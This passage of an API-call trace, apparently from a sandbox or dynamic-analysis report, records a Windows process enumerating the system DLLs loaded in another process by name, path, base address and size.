EntryPoint=0x7feff450760)) returned 1 [0054.309] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.309] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff430000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0054.310] CoTaskMemFree (pv=0x783720) [0054.310] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.310] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff430000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0054.311] CoTaskMemFree (pv=0x783720) [0054.311] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb750000, lpmodinfo=0x2618560, cb=0x18 | out: lpmodinfo=0x2618560*(lpBaseOfDll=0x7fefb750000, SizeOfImage=0xac000, EntryPoint=0x7fefb766acc)) returned 1 [0054.312] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.312] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb750000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="audiosrv.dll") returned 0xc [0054.313] CoTaskMemFree (pv=0x783720) [0054.313] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.313] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb750000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")) returned 0x20 [0054.315] CoTaskMemFree (pv=0x783720) [0054.315] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb720000, lpmodinfo=0x261a848, cb=0x18 | out: lpmodinfo=0x261a848*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0054.316] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.316] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb720000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0054.317] CoTaskMemFree (pv=0x783720) [0054.317] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.317] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb720000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0054.318] CoTaskMemFree (pv=0x783720) [0054.319] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdc80000, lpmodinfo=0x261ca30, cb=0x18 | out: lpmodinfo=0x261ca30*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0054.320] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.320] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdc80000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0054.321] CoTaskMemFree (pv=0x783720) [0054.321] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.321] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdc80000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0054.324] CoTaskMemFree (pv=0x783720) [0054.324] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd9a0000, lpmodinfo=0x261ec00, cb=0x18 | out: lpmodinfo=0x261ec00*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0054.325] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.326] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd9a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0054.327] CoTaskMemFree (pv=0x783720) [0054.327] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.327] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd9a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0054.329] CoTaskMemFree (pv=0x783720) [0054.329] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdf90000, lpmodinfo=0x2620dd0, cb=0x18 | out: lpmodinfo=0x2620dd0*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0054.331] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.331] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0054.333] CoTaskMemFree (pv=0x783720) [0054.333] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.333] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0054.335] CoTaskMemFree (pv=0x783720) [0054.335] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd980000, lpmodinfo=0x2622fa0, cb=0x18 | out: lpmodinfo=0x2622fa0*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0054.336] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.336] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd980000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0054.338] CoTaskMemFree (pv=0x783720) [0054.338] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.338] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd980000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0054.340] CoTaskMemFree (pv=0x783720) [0054.340] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefbcc0000, lpmodinfo=0x2625160, cb=0x18 | out: lpmodinfo=0x2625160*(lpBaseOfDll=0x7fefbcc0000, SizeOfImage=0x4b000, EntryPoint=0x7fefbccefcc)) returned 1 [0054.342] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.342] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefbcc0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="MMDevAPI.DLL") returned 0xc [0054.343] CoTaskMemFree (pv=0x783720) [0054.343] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.343] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefbcc0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\MMDevAPI.DLL" (normalized: "c:\\windows\\system32\\mmdevapi.dll")) returned 0x20 [0054.345] CoTaskMemFree (pv=0x783720) [0054.345] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefc130000, lpmodinfo=0x2627330, cb=0x18 | out: lpmodinfo=0x2627330*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0054.346] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.346] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefc130000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0054.348] CoTaskMemFree (pv=0x783720) [0054.348] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.348] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefc130000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0054.349] CoTaskMemFree (pv=0x783720) [0054.349] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb710000, lpmodinfo=0x26294f0, cb=0x18 | out: lpmodinfo=0x26294f0*(lpBaseOfDll=0x7fefb710000, SizeOfImage=0x9000, EntryPoint=0x7fefb711010)) returned 1 [0054.351] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.351] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb710000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="AVRT.dll") returned 0x8 [0054.352] CoTaskMemFree (pv=0x783720) [0054.353] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.353] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb710000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AVRT.dll" (normalized: "c:\\windows\\system32\\avrt.dll")) returned 0x1c [0054.355] CoTaskMemFree (pv=0x783720) [0054.355] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff360000, lpmodinfo=0x262b6b0, cb=0x18 | out: lpmodinfo=0x262b6b0*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0054.356] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.356] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff360000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0054.358] CoTaskMemFree (pv=0x783720) [0054.358] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.358] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff360000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0054.360] CoTaskMemFree (pv=0x783720) [0054.360] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff2d0000, lpmodinfo=0x262d870, cb=0x18 | out: lpmodinfo=0x262d870*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0054.361] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.361] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff2d0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0054.363] CoTaskMemFree (pv=0x783720) [0054.363] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.363] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff2d0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0054.365] CoTaskMemFree (pv=0x783720) [0054.365] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb640000, lpmodinfo=0x262fa30, cb=0x18 | out: lpmodinfo=0x262fa30*(lpBaseOfDll=0x7fefb640000, SizeOfImage=0xac000, EntryPoint=0x7fefb6518d0)) returned 1 [0054.366] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.366] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb640000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="cscsvc.dll") returned 0xa [0054.368] CoTaskMemFree (pv=0x783720) [0054.368] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.368] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb640000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll")) returned 0x1e [0054.370] CoTaskMemFree (pv=0x783720) [0054.370] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb20000, lpmodinfo=0x2631bf0, cb=0x18 | out: lpmodinfo=0x2631bf0*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0054.371] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.371] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb20000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0054.373] CoTaskMemFree (pv=0x783720) [0054.373] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.373] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb20000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0054.375] CoTaskMemFree (pv=0x783720) [0054.375] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd780000, lpmodinfo=0x2633db0, cb=0x18 | out: lpmodinfo=0x2633db0*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0054.377] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.377] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd780000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0054.379] CoTaskMemFree (pv=0x783720) [0054.379] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.379] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd780000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0054.380] CoTaskMemFree (pv=0x783720) [0054.380] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcc80000, lpmodinfo=0x2635f70, cb=0x18 | out: lpmodinfo=0x2635f70*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0054.382] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.382] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcc80000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="pcwum.dll") returned 0x9 [0054.384] CoTaskMemFree (pv=0x783720) [0054.384] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.384] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcc80000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0054.386] CoTaskMemFree (pv=0x783720) [0054.386] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb610000, lpmodinfo=0x2638130, cb=0x18 | out: lpmodinfo=0x2638130*(lpBaseOfDll=0x7fefb610000, SizeOfImage=0x30000, EntryPoint=0x7fefb62fe98)) returned 1 [0054.388] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.388] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb610000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="PeerDist.dll") returned 0xc [0054.390] CoTaskMemFree (pv=0x783720) [0054.390] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.390] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb610000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll")) returned 0x20 [0054.392] CoTaskMemFree (pv=0x783720) [0054.392] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd260000, lpmodinfo=0x263a300, cb=0x18 | out: lpmodinfo=0x263a300*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0054.394] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.394] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd260000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0054.396] CoTaskMemFree (pv=0x783720) [0054.396] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.396] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd260000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0054.398] CoTaskMemFree (pv=0x783720) [0054.398] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb4e0000, lpmodinfo=0x263c6d8, cb=0x18 | out: lpmodinfo=0x263c6d8*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0054.400] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.400] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb4e0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0054.402] CoTaskMemFree (pv=0x783720) [0054.402] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.402] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb4e0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0054.404] CoTaskMemFree (pv=0x783720) [0054.404] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd640000, lpmodinfo=0x263e8a8, cb=0x18 | out: lpmodinfo=0x263e8a8*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0054.406] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.406] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd640000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0054.409] CoTaskMemFree (pv=0x783720) [0054.409] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.409] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd640000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0054.411] CoTaskMemFree (pv=0x783720) [0054.411] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb3b0000, lpmodinfo=0x2640a80, cb=0x18 | out: lpmodinfo=0x2640a80*(lpBaseOfDll=0x7fefb3b0000, SizeOfImage=0x3d000, EntryPoint=0x7fefb3b1b7c)) returned 1 [0054.413] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.413] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb3b0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="mstask.dll") returned 0xa [0054.415] CoTaskMemFree (pv=0x783720) [0054.415] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.415] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb3b0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll")) returned 0x1e [0054.418] CoTaskMemFree (pv=0x783720) [0054.418] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefc2b0000, lpmodinfo=0x2642c40, cb=0x18 | out: lpmodinfo=0x2642c40*(lpBaseOfDll=0x7fefc2b0000, SizeOfImage=0x1f4000, EntryPoint=0x7fefc43c924)) returned 1 [0054.420] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.420] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefc2b0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="COMCTL32.dll") returned 0xc [0054.422] CoTaskMemFree (pv=0x783720) [0054.422] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.422] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefc2b0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\COMCTL32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")) returned 0x7c [0054.424] CoTaskMemFree (pv=0x783720) [0054.424] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd070000, lpmodinfo=0x2644ec8, cb=0x18 | out: lpmodinfo=0x2644ec8*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0054.426] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.426] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd070000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0054.429] CoTaskMemFree (pv=0x783720) [0054.429] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.429] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd070000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0054.431] CoTaskMemFree (pv=0x783720) [0054.431] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcd70000, lpmodinfo=0x2647088, cb=0x18 | out: lpmodinfo=0x2647088*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0054.433] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.433] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0054.435] CoTaskMemFree (pv=0x783720) [0054.435] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.435] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0054.438] CoTaskMemFree (pv=0x783720) [0054.438] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd760000, lpmodinfo=0x2649248, cb=0x18 | out: lpmodinfo=0x2649248*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0054.440] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.440] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd760000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0054.442] CoTaskMemFree (pv=0x783720) [0054.442] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.442] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd760000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0054.445] CoTaskMemFree (pv=0x783720) [0054.445] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefbb00000, lpmodinfo=0x264b418, cb=0x18 | out: lpmodinfo=0x264b418*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0054.448] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.448] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefbb00000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0054.451] CoTaskMemFree (pv=0x783720) [0054.451] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.451] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefbb00000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0054.453] CoTaskMemFree (pv=0x783720) [0054.453] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd720000, lpmodinfo=0x264d5e8, cb=0x18 | out: lpmodinfo=0x264d5e8*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0054.455] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.455] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd720000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0054.458] CoTaskMemFree (pv=0x783720) [0054.458] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.458] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd720000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0054.460] CoTaskMemFree (pv=0x783720) [0054.460] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb00000, lpmodinfo=0x264f7a8, cb=0x18 | out: lpmodinfo=0x264f7a8*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0054.463] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.463] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb00000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0054.465] CoTaskMemFree (pv=0x783720) [0054.465] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.465] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb00000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0054.468] CoTaskMemFree (pv=0x783720) [0054.468] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb0d0000, lpmodinfo=0x2651968, cb=0x18 | out: lpmodinfo=0x2651968*(lpBaseOfDll=0x7fefb0d0000, SizeOfImage=0x10000, EntryPoint=0x7fefb0d27f0)) returned 1 [0054.470] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.470] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb0d0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="uxsms.dll") returned 0x9 [0054.473] CoTaskMemFree (pv=0x783720) [0054.473] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.473] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb0d0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll")) returned 0x1d [0054.476] CoTaskMemFree (pv=0x783720) [0054.476] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefbc60000, lpmodinfo=0x2653b28, cb=0x18 | out: lpmodinfo=0x2653b28*(lpBaseOfDll=0x7fefbc60000, SizeOfImage=0x35000, EntryPoint=0x7fefbc61064)) returned 1 [0054.478] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.478] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefbc60000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="XmlLite.dll") returned 0xb [0054.481] CoTaskMemFree (pv=0x783720) [0054.481] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.481] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefbc60000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\XmlLite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")) returned 0x1f [0054.483] CoTaskMemFree (pv=0x783720) [0054.483] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa150000, lpmodinfo=0x2655ce8, cb=0x18 | out: lpmodinfo=0x2655ce8*(lpBaseOfDll=0x7fefa150000, SizeOfImage=0x33000, EntryPoint=0x7fefa15101c)) returned 1 [0054.486] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.486] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa150000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="pcasvc.dll") returned 0xa [0054.488] CoTaskMemFree (pv=0x783720) [0054.488] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.488] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa150000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll")) returned 0x1e [0054.491] CoTaskMemFree (pv=0x783720) [0054.491] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa0f0000, lpmodinfo=0x2657ea8, cb=0x18 | out: lpmodinfo=0x2657ea8*(lpBaseOfDll=0x7fefa0f0000, SizeOfImage=0x57000, EntryPoint=0x7fefa0f1118)) returned 1 [0054.494] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.494] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa0f0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0054.496] CoTaskMemFree (pv=0x783720) [0054.496] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.496] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa0f0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")) 